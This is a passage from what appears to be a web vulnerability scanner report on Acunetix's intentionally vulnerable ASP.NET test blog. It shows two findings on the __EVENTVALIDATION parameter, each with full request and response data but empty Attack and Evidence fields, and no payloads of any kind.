style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8268&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBASRcIg9oIZGRkkHiFhNT9lJRf1eqqm3er5id3Cjw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK5iOm%2BAQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DjUtHbnVZG%2FmTt%2F%2FR6lnl4HURYlU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:38:15 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBASRcIg9oIZGRkkHiFhNT9lJRf1eqqm3er5id3Cjw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK5iOm+AQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DjUtHbnVZG/mTt//R6lnl4HURYlU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:White" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8203&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAb1L0T9oIZGRkC3WueodcpGqhPAguhWwGtI17VQY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK5jMrZAwK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2BwhY3%2F9V34igxc%2FJoL7IceGEsEjw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:47 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAb1L0T9oIZGRkC3WueodcpGqhPAguhWwGtI17VQY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK5jMrZAwK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w+whY3/9V34igxc/JoL7IceGEsEjw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:White" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" 